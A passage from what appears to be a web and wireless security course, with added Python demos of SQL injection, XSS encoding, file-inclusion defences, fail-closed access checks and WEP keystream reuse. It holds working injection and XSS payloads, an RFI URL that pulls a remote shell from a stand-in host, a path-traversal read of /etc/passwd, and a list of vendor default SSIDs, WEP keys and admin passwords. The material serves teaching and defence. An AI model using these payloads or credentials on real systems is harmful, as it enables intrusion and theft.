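def login_vulnerable(con, formusr, formpwd):
    """String concatenation, as in the page's ASP example. Never do this."""
    sql = ("SELECT * FROM users WHERE login = '" + formusr +
           "' AND password = '" + formpwd + "'")
    return con.execute(sql).fetchall()

def login_safe(con, formusr, formpwd):
    """Parameterized query: user input is bound as data, never parsed as SQL."""
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return con.execute(sql, (formusr, formpwd)).fetchall()

def article_vulnerable(con, formid):
    """Unquoted numeric parameter, like the page's PHP/MySQL clients query."""
    return con.execute(
        "SELECT id, login, password FROM users WHERE id = " + formid).fetchall()

def article_safe(con, formid):
    """Reject anything that is not an integer, then bind it."""
    return con.execute(
        "SELECT id, login, password FROM users WHERE id = ?", (int(formid),)).fetchall()

def count_columns(con, limit=20):
    """The ORDER BY trick from the page: raise n until the database complains."""
    for n in range(1, limit + 1):
        try:
            article_vulnerable(con, "1 ORDER BY %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None

def list_tables_via_union(con):
    """UNION SELECT with the column count found above; sqlite_master plays the
    role of INFORMATION_SCHEMA.tables."""
    rows = article_vulnerable(
        con, "0 UNION ALL SELECT 1, name, 3 FROM sqlite_master WHERE type='table'")
    return [row[1] for row in rows]

if __name__ == "__main__":
    con = make_db()
    print("bypass with comment:", login_vulnerable(con, "' or 1=1 --", "anything"))
    print("bypass in both fields:", login_vulnerable(con, "' or 'a'='a", "' or 'a'='a"))
    print("AND binds tighter than OR:", login_vulnerable(con, "' or 'a'='a", "anything"))
    print("parameterized:", login_safe(con, "' or 1=1 --", "anything"))
    print("numeric injection:", article_vulnerable(con, "1 or 1=1 --"))
    print("columns:", count_columns(con), "tables:", list_tables_via_union(con))
```

    The same payloads that return every row from login_vulnerable return nothing from login_safe, because the driver sends them as string values rather than splicing them into the statement; that, not keyword filtering, is what the "parameterized API" item in the mitigation list buys you.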

    XSS ( Cross Site Scripting)

    Occurs any time

    Raw data from attacker is sent to an innocent user

    Raw data

    Stored in database

    Reflected from web input (form field, hidden field, url, etc)

    Sent directly into rich JavaScript client

  • 36

    Virtually every web application has this problem

    Try this in your browser javascript:alert(document.cookie)

    Stored XSS

    Reflected XSS

    Business Impact of XSS

    Attackers can

    Steal user sessions for complete account takeover.

    Steal data on web pages viewed by victim.

    Deface pages viewed by victim.

    Use web pages for phishing.

    Finding XSS

    Most common locations: blogs, forums, shout boxes, comment boxes and search boxes; any place that echoes back what the user typed.

    Using Google dorks: search for inurl:"search.php?q="

    XSS Examples

    http://site.com/search.php?q=<script>alert("XSS")</script>

    http://site.com/search.php?q=<script>window.open("http://www.google.com/")</script>

    Case Study: XSS

    In 2004 a British researcher, Jim Ley, discovered an XSS flaw in Google and provided a proof-of-concept phishing page on which Google appeared to have become a paying service and asked the visitor to kindly provide credit card details. The flaw has since been fixed.

    Preventing XSS

    Be sure that there is a plan for input validation and output encoding.

    Be sure that the plan covers all input data, not just form fields.

    Positive (allow-list) validation for all untrusted input fields.

    HTML entity encoding of every piece of untrusted data at the point where it is written into the page.

    Fixing XSS

    If you find XSS bugs in your scripts they are easy to fix. Take a look at the code below.

    if(isset($_POST['form'])){echo "" .$_POST['form']. "";}

    Here the variable $_POST['form'] comes straight from an input box and is echoed unchanged, so you have an XSS bug.

    The following is a very easy way to secure it.

    $charset='UTF-8';
    $data = htmlentities($_POST['form'], ENT_QUOTES, $charset);
    if(isset($data)){echo "" .$data. "";}

    This turns every character that could start markup into its entity form, so < becomes &lt;, > becomes &gt;, and the quote characters become &quot; and &#039;, which the browser displays but never executes. Use ENT_QUOTES rather than ENT_NOQUOTES: with quotes left alone, data placed inside an HTML attribute can still close the attribute and add an event handler.

    $id = $_GET['id'];
    echo "you are viewing " . $id . " blog";

    If we put ?id=<script>alert("XSS")</script> into the URL it will execute our code. A very easy way to secure a parameter that must be a number is an (int) cast. Check the following code:

    $id = (int)$_GET['id'];
    echo "you are viewing " . $id . " blog";

    The cast keeps only a leading integer: "5" stays 5, "5<script>" becomes 5, and anything that does not start with a digit becomes 0, so no markup can survive the cast.
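    The program below is an added example written in Python rather than the page's PHP (html.escape with quote=False and quote=True mirror htmlentities with ENT_NOQUOTES and ENT_QUOTES). It renders the same untrusted search string into an attribute and into the page body, audits the result with a real HTML parser, and shows the case the text warns about: a payload with no angle brackets at all that quote-less encoding lets through. The payloads, the page template and the PHP-style integer cast are constructed for the example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed attacker inputs (not from the course material).
BODY_PAYLOAD = '<script>alert("XSS")</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'   # no < or > needed

def render_noquotes(value: str) -> str:
    """Like htmlentities(..., ENT_NOQUOTES): encodes & < > but leaves quotes alone."""
    return escape(value, quote=False)

def render_quotes(value: str) -> str:
    """Like htmlentities(..., ENT_QUOTES): also encodes " and '."""
    return escape(value, quote=True)

def search_page(query: str, encode) -> str:
    """The same untrusted value lands in an attribute and in the body."""
    return (f'<input type="text" name="q" value="{encode(query)}">'
            f'<p>Results for {encode(query)}</p>')

class _Audit(HTMLParser):
    """Records script tags and on* event-handler attributes the browser would act on."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")

def audit(page: str) -> list:
    parser = _Audit()
    parser.feed(page)
    parser.close()
    return parser.findings

def coerce_id(raw: str) -> int:
    """PHP-style (int) cast: keep a leading integer, anything else becomes 0."""
    m = re.match(r"\s*[+-]?\d+", raw)
    return int(m.group()) if m else 0
```

    audit(search_page(ATTR_PAYLOAD, render_noquotes)) reports an injected onmouseover handler even though the script-tag payload is neutralised by the same encoder; only render_quotes leaves both contexts clean. The lesson is the one in the text: encode quotes as well, and encode for the context the data is written into.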

    Malicious File Inclusion - RFI

    Malicious file execution vulnerabilities are found in many applications. Developers will often directly use or concatenate potentially hostile input with file or stream functions, or improperly trust input files.

    On many platforms, frameworks allow the use of external object references, such as URLs or file system references.

    When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server.

    Business Impact of RFI

    This allows attackers to perform:

    Remote code execution

    Remote rootkit installation and complete system compromise

    Remote shell installation

    Remote modification and deletion of files on the server

    RFI (Remote File Inclusion)

    If allow_url_include is On in php.ini, we can include a shell directly from our own server. You only need to point the vulnerable parameter, by GET or POST, at a URL that serves the shell source with a non-PHP extension, so that the attacker's own server hands out the source instead of executing it:

    Take a page such as http://www.techdefence.com/index.php?page=news.php

    Now if index.php includes the page parameter without checking it, for example include($_GET['page']);, the same URL can be written as

    http://www.techdefence.com/index.php?page=http://www.evilscript.com/shell.txt

    and the web server fetches shell.txt and executes it as PHP.

    Fixing RFI

    Practice secure coding techniques: never pass user input to include(), require() or their _once variants. Map the parameter onto an allow-list of known page names and reject everything else.

    Moving the parameter from $_GET to $_POST does not help; POST data is just as easy for an attacker to supply.

    Set allow_url_include = Off (the default) and, where the application does not need it, allow_url_fopen = Off in php.ini.

    Set file permissions so that the web server account can read only the files it needs and can write nowhere that is later included or executed.

    PHP's safe_mode was once recommended for this; it never provided real isolation and was removed in PHP 5.4, so do not rely on it.

    Restrict what the web server's operating system account can reach, for example by removing unneeded shell utilities and binaries from its path.

    Insecure Direct Object Reference / LFI (Local File Inclusion)

    A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record or key, as a URL or form parameter.

    An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.

    Insecure Direct Object Reference

    Websites often use an include() system to display their pages, and very often this system is insecure.

    A practical example: index.php includes whatever file the page parameter names, for example include($_GET['page']);, which results in a website with links such as

    index.php?page=about.php
    index.php?page=news.php

    The simplest way to see if a script is vulnerable to local file inclusion is this:

    index.php?page=../../../../../../../../../etc/passwd

    Each ../ moves the script up one directory; enough of them reach the top-level directory (/, the root of the filesystem), and /etc/passwd is the Unix account file. Its contents are then shown in the page:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    ...and so on.

    This lists every local account with its home directory and shell (the password hashes live in /etc/shadow, which the web server account normally cannot read). The same trick reads any other file the web server can open, including the application's own source and configuration files.

    Fixing Insecure Direct Object Reference

    Avoid exposing your private object references, such as primary keys or filenames, to users whenever possible; hand out an indirect reference (a key into a server-side map) instead.

    Verify authorization to all referenced objects, and canonicalize file paths before checking that they stay inside the intended directory.
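    The following is an added Python example (not code from the course material) of the two fixes just described, covering both the RFI and the LFI sections: an indirect reference that maps a page name to a file, and a defence-in-depth path check for code that must accept a filename, which refuses URL and wrapper schemes, null bytes and any path that resolves outside the pages directory. The pages directory, its two placeholder files and the list of probes are constructed inside a temporary directory so the demo runs anywhere.

```python
import os
import tempfile
from urllib.parse import urlsplit

class IncludeError(Exception):
    pass

# Constructed allow-list (an assumption for this example): the only pages
# the application ships. The request parameter is a key, never a path.
ALLOWED_PAGES = {"about": "about.php", "news": "news.php"}

def resolve_page_allowlist(page_param: str) -> str:
    try:
        return ALLOWED_PAGES[page_param]
    except KeyError:
        raise IncludeError("unknown page") from None

def resolve_page_path(base_dir: str, page_param: str) -> str:
    """Path check for code that must take a filename:
    reject URLs and PHP wrappers (RFI), null bytes, and anything that
    canonicalizes to a location outside base_dir (LFI)."""
    if "\x00" in page_param:                   # classic null-byte truncation
        raise IncludeError("null byte in path")
    if urlsplit(page_param).scheme:            # http://, ftp://, php://, data:, ...
        raise IncludeError("remote or wrapper scheme refused")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page_param))
    if os.path.commonpath([base, target]) != base:
        raise IncludeError("path escapes the pages directory")
    if not os.path.isfile(target):
        raise IncludeError("no such page")
    return target

# Probes taken from the text plus two common variants.
PROBES = [
    "news.php",
    "../../../../../../../../../etc/passwd",
    "http://www.evilscript.com/shell.txt",
    "php://filter/convert.base64-encode/resource=index.php",
    "news.php\x00.jpg",
]

def demo() -> dict:
    """Builds a throwaway pages directory and returns a verdict per probe."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.mkdir(pages)
        for name in ALLOWED_PAGES.values():
            with open(os.path.join(pages, name), "w") as f:
                f.write("<?php // constructed placeholder ?>\n")
        verdicts = {}
        for probe in PROBES:
            try:
                resolve_page_path(pages, probe)
                verdicts[probe] = "allowed"
            except IncludeError as err:
                verdicts[probe] = f"refused: {err}"
        return verdicts

def allowlist_verdict(page_param: str) -> str:
    try:
        return "allowed: " + resolve_page_allowlist(page_param)
    except IncludeError as err:
        return f"refused: {err}"
```

    demo() allows only news.php and refuses the other four probes with a reason each; resolve_page_allowlist() is the preferred design because it never turns user input into a path at all.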

    Information Leakage and Improper Error Handling

    Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems.

    Applications can also leak internal state via how long they take to process certain operations, or via different responses to differing inputs, such as displaying the same error text with different error numbers.

    Web applications will often leak information about their internal state through detailed or debug error messages, such as a stack trace or a database error that names tables and columns.

    Improper Error Handling

    Many security mechanisms fail open: a check such as

    isAuthenticated()
    isAuthorized()
    isValid()

    that runs into an unexpected condition (an exception, a missing record, a timeout) ends up granting access instead of refusing it.

    Bad logic (fails open)

    if (!security_test())
    then return false
    return true

    Good logic (fails secure)

    if (security_test())
    then return true
    return false

    Both versions return the same value when security_test() runs normally. The difference is the default outcome. In the first, "allow" is what the function falls through to, so any path that skips or interrupts the check, for example an exception that is caught and logged without returning, ends in access being granted. In the second, "deny" is the fall-through outcome and access is granted only on an explicit pass.

    Broken Authentication & Session Management

    Proper authentication and session management is critical to web application security.

    Flaws in this area most frequently involve the failure to protect credentials and session tokens throughout their lifecycle.

    Business Impact of BA & SM

    An attacker can

    Hijack user accounts

    Hijack administrative accounts

    Undermine authorization and accountability controls

    Cause privacy violations

    Fixing BA & SM

    Only use the platform's built-in session management mechanism; do not invent your own session identifiers.

    Use a single authentication mechanism for the whole application.

    Do not allow the login process to start from an unencrypted page: serve the login form and its POST target over HTTPS.

    Ensure that every page has a logout link, and that logout invalidates the session on the server.

    Use a timeout period: expire idle sessions, and issue a fresh session identifier after a successful login.

    Do not expose any session identifiers or any portion of valid credentials in URLs or logs.

    Failure to Restrict URL Access

    Frequently, the only protection for a URL is that links to that page are not presented to unauthorized users.

    However, a motivated, skilled, or just plain lucky attacker may be able to find and access these pages, invoke functions, and view data.

    Fixing Failure to Restrict URL Access

    Ensure the access control matrix is part of the business, architecture and design of the application.

    Ensure that all URLs and business functions are protected by an effective access control mechanism that is applied to every request, not only to the links a page chooses to show.

    Pay close attention to include/library files: they must not be callable directly.

    Do not assume that users will be unaware of special or hidden URLs or APIs.

    Keep up to date with virus protection and with patches for the web server, framework and application components.
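    The Python program below is an added example, not code from the course material, and it serves both the Improper Error Handling section and the Failure to Restrict URL Access section: an access control matrix that is consulted for every request, a fail-open check written the way the "bad logic" above is, and a fail-closed check written the way the "good logic" is. The matrix, the session object and the role lookup (which can be made to fail, standing in for a database or directory outage) are all constructed for the example.

```python
import logging
from dataclasses import dataclass
from typing import Optional, Tuple

log = logging.getLogger("access")

# Constructed access control matrix (an assumption for this example): every
# URL the application serves is listed; a URL that is not listed is nobody's.
ACCESS_MATRIX = {
    "/index.php":        {"anonymous", "user", "admin"},
    "/account.php":      {"user", "admin"},
    "/admin/users.php":  {"admin"},
    "/admin/export.php": {"admin"},
}

@dataclass
class Session:
    user: str
    role: str

class RoleLookupError(Exception):
    """Stands in for any unexpected failure inside a security check."""

def lookup_role(session: Optional[Session]) -> str:
    # Constructed role lookup; the "broken" role models a store that is down.
    if session is None:
        return "anonymous"
    if session.role == "broken":
        raise RoleLookupError("role store unavailable")
    return session.role

def is_authorized_fail_open(path: str, session: Optional[Session]) -> bool:
    # The page's "bad logic": allow is the fall-through result. Two ways to
    # reach it wrongly: an unlisted (hidden) URL, and a swallowed exception.
    try:
        role = lookup_role(session)
        if role not in ACCESS_MATRIX.get(path, {"anonymous", "user", "admin"}):
            return False
    except RoleLookupError as err:
        log.error("role lookup failed: %s", err)
    return True

def is_authorized_fail_closed(path: str, session: Optional[Session]) -> bool:
    # The page's "good logic": deny is the fall-through result. Only a request
    # whose check completed and matched the matrix returns True.
    try:
        role = lookup_role(session)
        if role in ACCESS_MATRIX.get(path, set()):   # unlisted URL: empty set
            return True
    except RoleLookupError as err:
        log.error("role lookup failed: %s", err)     # detail goes to the log
    return False

def handle_request(path: str, session: Optional[Session]) -> Tuple[int, str]:
    """Applies the check to every request and returns a generic client-facing error."""
    if is_authorized_fail_closed(path, session):
        return 200, f"OK {path}"
    return 403, "Forbidden"       # no stack trace, SQL text or role names leak
```

    With a session whose role lookup fails, is_authorized_fail_open() grants /admin/users.php and also grants any URL missing from the matrix to an anonymous caller; is_authorized_fail_closed() refuses both, and handle_request() tells the client only "Forbidden" while the reason stays in the server log.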


    2.5 Security Guidelines.

    1. Validate Input and Output

    2. Fail Securely (Closed)

    3. Keep it Simple

    4. Use and Reuse Trusted Components

    5. Defence in Depth

    6. Only as Secure as the Weakest Link

    7. Security By Obscurity Won't Work

    8. Least Privilege

    9. Compartmentalization (Separation of Privileges)

    Validate Input & Output

    All user input and user output should be checked to ensure it is both appropriate

    and expected.

    Allow only explicitly defined characteristics and drop all other data.

    Fail Securely

    When it fails, it fails closed.

    It should fail to a state that rejects all subsequent security requests.

    A good analogy is a firewall: if a firewall fails, it should drop all subsequent packets.

    Keep It Simple

    If a security system is too complex for its user base, it will either not be used or

    users will try to find measures to bypass it.

    This message applies equally to tasks that an administrator must perform in order

    to secure an application.

    This message is also intended for security layer APIs that application developers must use to build the system.

    Use & Reuse Components

    Using and reusing trusted components makes sense both from a resource stance

    and from a security stance.

    When someone else has proven they got it right, take advantage of it.

    Defence In Depth

    Relying on one component to perform its function 100% of the time is unrealistic.

    While we hope to build software and hardware that works as planned, predicting

    the unexpected is difficult. Good systems don't predict the unexpected, but plan

    for it.

    Only as Secure as the Weakest Link

    Careful thought must be given to what one is securing.

    Attackers are lazy and will find the weakest point and attempt to exploit it.

    Security By Obscurity Won't Work

    It's naive to think that hiding things from prying eyes doesn't buy some amount of

    time.

    This strategy doesn't work in the long term and has no guarantee of working in

    the short term.

    Least Privilege

    Systems should be designed in such a way that they run with the least amount of

    system privilege they need to do their job.

    Compartmentalization (Separation of Privileges)

    Compartmentalizing users, processes and data helps contain problems if they do occur.

    Compartmentalization is an important concept widely adopted in the information

    security realm.

    CHAPTER 3

    Wireless Hacking & Security

    3.1 Wireless Standards

    3.2 WEP & WPA Summary

    3.3 Cracking WEP & WPA

    3.1 Wireless Standards

    Wireless networking technology is becoming increasingly popular, but at the same time it has introduced many security issues. The popularity of wireless technology is driven by two primary factors: convenience and cost. A wireless local area network (WLAN) allows workers to access digital resources without being locked to their desks. Laptops can be carried into meetings, or even into a Starbucks cafe, and still tap into the wireless network. This convenience has become affordable.

    Wireless LAN standards are defined by the IEEE's 802.11 working group. The three original flavours of WLAN are:

    802.11b

    Operates in the 2.4000 GHz to 2.4835 GHz frequency range and can operate at up to 11 megabits per second.

    802.11a

    Operates in the 5.15-5.35 GHz and 5.725-5.825 GHz frequency ranges and can operate at up to 54 megabits per second.

    802.11g

    Operates in the 2.4 GHz frequency range, is backwards compatible with 802.11b, and can operate at up to 54 megabits per second.

    When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network settings such as IP address and subnet mask.

    In the 2.4 GHz band the channel is a number between 1 and 11 (1 and 13 in Europe) and designates the frequency on which the network will operate.

    The SSID is an alphanumeric string that differentiates networks operating on the same channel.

    It is essentially a configurable name that identifies an individual network. These settings are important factors when identifying WLANs and sniffing traffic.

    SSIDs

    The SSID is an identifier that wireless networking devices use to establish and maintain wireless connectivity. On an open access point the SSID is the only thing a client needs to know, so it is sometimes treated as if it were a shared password between access points and clients; it is not one, since it is broadcast in clear text in beacons and probe responses. Security concerns arise when the default values are not changed, as such units can be easily compromised. A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any".

    Attacker's point of view:

    If the target access point responds to a broadcast SSID probe, the attacker might just be in luck. Most wireless card drivers are configured with an SSID of ANY so that they can associate with whatever wireless network is present. When the SSID is set to ANY, the driver sends a probe request to the broadcast address with a zero-length SSID, and most access points that answer such requests respond with their SSID and configuration. Though this makes things easier for the user, who does not have to remember the SSID to connect to the wireless LAN, it makes it much simpler for attackers to gather SSIDs. Some of the common default SSIDs and passwords are:

    3Com AirConnect 2.4 GHz DS (newer 11mbit, Harris/Intersil Prism based)

    Default SSID: 'comcomcom'

    3Com other Access Points

    Default SSID: '3com'

    Addtron (Model:?)

    Default SSID: 'WLAN'

    Cisco Aironet 900Mhz/2.4GHz BR1000/e, BR5200/e and BR4800


    Default SSID: 'tsunami'; '2'

    Console Port: No Default Password

    Telnet password: No Default Password

    HTTP management: On by default, No Default Password

    Apple Airport

    Default SSID: 'AirPort Network'; 'AirPort Netzwerk'

    BayStack 650/660 802.11 DS AP

    Default SSID: 'Default SSID'

    Default admin pass:

    Default Channel: 1

    MAC addr: 00:20:d8:XX:XX:XX

    Compaq WL-100/200/300/400

    Default SSID: 'Compaq'

    Dlink DL-713 802.11 DS Access Point

    Default SSID: 'WLAN'

    Default Channel: 11

    Default IP address: DHCP-administered

    INTEL Pro/Wireless 2011 802.11 DSSS - PC Card

    Default SSID: '101' ; 'xlan' ; 'intel' ; '195'


    Default Channel: 3

    INTEL Pro/Wireless 2011 802.11 DSSS - Access Point

    Default SSID: '101' ; '195'

    LINKSYS WAP-11 802.11 DS Access Point

    Default SSID: 'linksys'

    Default Channel: 6

    Default WEP key one: 10 11 12 13 14 15

    Default WEP key two: 20 21 22 23 24 25

    Default WEP key three: 30 31 32 33 34 35

    Default WEP key four: 40 41 42 43 44 45

    LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card

    Default SSID: 'linksys' ; 'Wireless'

    Default Channel: 3 ; 6 ; 11

    Netgear 802.11 DS ME102 / MA401

    Default SSID: 'wireless'

    Default Channel: 6

    Default IP address: 192.168.0.5

    Default WEP: Disabled

    Default WEP KEY1: 11 11 11 11 11


    Default WEP KEY2: 20 21 22 23 24

    Default WEP KEY3: 30 31 32 33 34

    Default WEP KEY4: 40 41 42 43 44

    Default MAC: 00:30:ab:xx:xx:xx

    SMC Access Point Family SMC2652W

    Default SSID: 'WLAN'

    Default Channel: 11

    Default HTTP: user: default pass: WLAN_AP

    Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx)

    Console Port: No Password, AT command set

    SMC 2526W Wireless Access Point Dual-Dipole

    Default SSID: 'WLAN'

    Default IP: 192.168.0.254

    Default MAC: 00:90:d1:00:11:11(00:90:d1:xx:xx:xx)

    Default AP Name: MiniAP

    Default Channel: 11

    Default Admin Pass: MiniAP

    SMC 2682W EZ-Connect Wireless Bridge

    Default SSID: 'BRIDGE'


    Default Channel: 11

    Default Admin pass: WLAN_BRIDGE

    Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)

    SOHOware NetBlaster II

    Default SSID: same as mac

    Default MAC:00:80:c6:xx:xx:xx

    Default Channel:8

    Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS

    Default SSID: '101'

    Default MAC: 00:a0:0f:xx:xx:xx

    Default WEP key one: 10 11 12 13 14 15

    Default WEP key two: 20 21 22 23 24 25

    Default WEP key three: 30 31 32 33 34 35

    Default WEP key four: 40 41 42 43 44 45

    TELETRONICS WL-Access Point

    Default SSID: 'any'

    Default Password: 1234

    Console Port: No password, AT command set

    Wave Lan Family


    Default SSID: 'WaveLAN Network'

    Default channel: 3

    ZCOMAX Access Point XWL450

    Default SSID: 'any'; 'mello' ; 'Test'

    Default password: 1234

    Console Port: No Password, AT command set

    ZYXEL Prestige 316 Gateway/Natbox/WirelessBridge

    Default SSID: 'Wireless'

    Default Channel: 1

    Default console pass: 1234

    Default telnet pass: 1234

    Console Port: Same password for system, ansi/vt100 terminal

    1stWave Access Points

    Default SSID: '1stWave'

    ELSA Lancom Wireless L-11 / AirLancer

    Default SSID: 'ELSA'


    3.2 WEP & WPA Summary

    WEP

    WEP (Wired Equivalent Privacy) is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Wired LANs typically employ physical controls to prevent unauthorized users from connecting to the network and viewing data. In a wireless LAN, the network can be accessed without physically connecting to it, so the IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping. This is accomplished by encrypting each frame with the RC4 stream cipher, keyed with a per-frame initialization vector (IV) prepended to the shared secret key.

    Deficiencies of WEP

    The IV is too short (24 bits, so only about 16.7 million values) and nothing in the standard prevents its reuse; a busy access point cycles through the whole space in a matter of hours, after which frames share keystreams.

    The per-packet key is constructed by simply prepending the IV to the shared key, making it susceptible to weak-key attacks on RC4 that recover the shared key from captured frames.

    No effective message integrity check: the CRC-32 integrity value is linear, so an attacker can flip bits in a frame and fix up the checksum without knowing the key.

    No built-in provision to update the key on all wireless clients connected to an access point, so the same key stays in use for a long time.

    No protection against message replay.
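    The following Python program is an added example, not code from the course material. It implements RC4 and the WEP per-frame keying (IV prepended to the shared key, IV sent in clear) and then shows the first deficiency listed above: two frames encrypted under the same IV share a keystream, so XORing the ciphertexts cancels it and one known plaintext reveals the other, with no knowledge of the key. The 40-bit key, the IV and the two frame payloads are constructed for the demonstration, and the CRC-32 integrity value WEP appends is left out because it plays no part in this attack.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the keystream generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-frame encryption: RC4 keyed with the 24-bit IV followed by the
    40- or 104-bit shared key; the IV travels in clear ahead of the ciphertext."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + secret_key, plaintext)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def keystream_reuse_attack(frame1: bytes, frame2: bytes, known_plaintext1: bytes) -> bytes:
    """Two frames with the same IV share a keystream K, so
    C1 xor C2 = (P1 xor K) xor (P2 xor K) = P1 xor P2,
    and a known P1 yields P2 without the key."""
    iv1, c1 = frame1[:3], frame1[3:]
    iv2, c2 = frame2[:3], frame2[3:]
    if iv1 != iv2:
        raise ValueError("different IVs: the keystreams differ")
    n = min(len(c1), len(c2), len(known_plaintext1))
    return xor(xor(c1[:n], c2[:n]), known_plaintext1[:n])

# Constructed values (not from the course material).
SECRET = bytes.fromhex("0a1b2c3d4e")                      # 40-bit WEP key
P1 = b"GET /index.php?page=news.php HTTP/1.0\r\n"         # guessable request
P2 = b"GET /admin/users.php?token=deadbeef\r\n"           # the one we want

def demo() -> bytes:
    iv = bytes.fromhex("00aa55")          # one of only 2**24 possible IVs
    frame1 = wep_encrypt(SECRET, iv, P1)
    frame2 = wep_encrypt(SECRET, iv, P2)  # same IV and key: same keystream
    return keystream_reuse_attack(frame1, frame2, P1)
```

    demo() returns P2 exactly, using nothing but the two captured frames and a guess at the first plaintext. The weak-key (FMS) attack that AirSnort and WEPCrack implement goes further and recovers the shared key itself, but this keystream collision is the simplest consequence of the short, unmanaged IV.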

    WPA and WPA2

    WPA stands for Wi-Fi Protected Access. It was published by the Wi-Fi Alliance as an interim replacement for WEP based on a draft of IEEE 802.11i; WPA-Enterprise uses IEEE 802.1X for authentication, while WPA-Personal uses a pre-shared key. WPA keeps the RC4 stream cipher so that existing hardware could be upgraded in software, but wraps it in TKIP (Temporal Key Integrity Protocol): a 128-bit key, a 48-bit IV that doubles as a sequence counter against replay, and per-packet key mixing in place of WEP's simple IV prepending, together with the Michael message integrity code (MIC) to ensure data integrity. WPA2 implements the full 802.11i standard and replaces RC4/TKIP with AES in CCMP mode.

    Hacking Tools

    1. NetStumbler: http://www.netstumbler.org

    NetStumbler displays:

    Signal strength

    MAC address

    SSID

    Channel details

    NetStumbler is a Windows-based war-driving tool that detects wireless networks and marks their relative position with a GPS. NetStumbler sends an 802.11 probe request to the broadcast destination address, causing all access points in the area to issue an 802.11 probe response containing network configuration information, such as their SSID and WEP status. When hooked up to a GPS, NetStumbler records a GPS coordinate for the highest signal strength found for each access point. Using the network and GPS data, the user can create maps with tools such as Microsoft MapPoint.

    2. AiroPeek: http://www.wildpackets.com

    AiroPeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher-level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. In addition, AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates.

    3. AirSnort: http://airsnort.shmoo.com/

    AirSnort is a wireless LAN (WLAN) tool which recovers WEP encryption keys. AirSnort operates by passively monitoring transmissions and computing the key once enough frames carrying weak IVs have been gathered. AirSnort requires approximately 5-10 million encrypted packets to be collected; once it has them, it can recover the key in under a second.

    4. Kismet

    Kismet is an 802.11b wireless network sniffer which separates and identifies the different wireless networks in the area. Kismet works with any wireless card which is capable of reporting raw packets.

    5. WEPCrack

    WEPCrack is an open-source tool for breaking 802.11 WEP secret keys. While AirSnort has captured the media attention, WEPCrack was the first publicly available code that demonstrated the weak-IV attack AirSnort uses.

    The current tools are Perl based and are composed of the following scripts: WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl

    Countermeasures:

    Do not configure your Wi-Fi router as an unsecured (open) network. Anyone in range can use it, and whatever they do will be traced back to your connection.

    ISPs often configure your phone or mobile number as the default network key in the router. Change it as soon as possible if that is the case.

    If the network must stay open, enable logging on the router. This lets you record the MAC (Media Access Control) addresses of the machines that use it.

    If it must stay open, also install packet-capturing or WLAN-analysis software so that you can keep an eye on the machines using your router.

    If it must stay open, bind the MAC addresses of your own laptops to the router so that only they are allowed to connect. MAC addresses can be sniffed and spoofed, so treat this as a deterrent rather than as real access control.

    Change the default SSID, and do not use WEP even if the ISP configured your router with it; use WPA2 with a strong passphrase.

    Never join unknown open networks with names like "Free internet" or "wifi"; such networks are often set up precisely to capture data from the laptops that connect to them.

    Keep all logs for at least six months.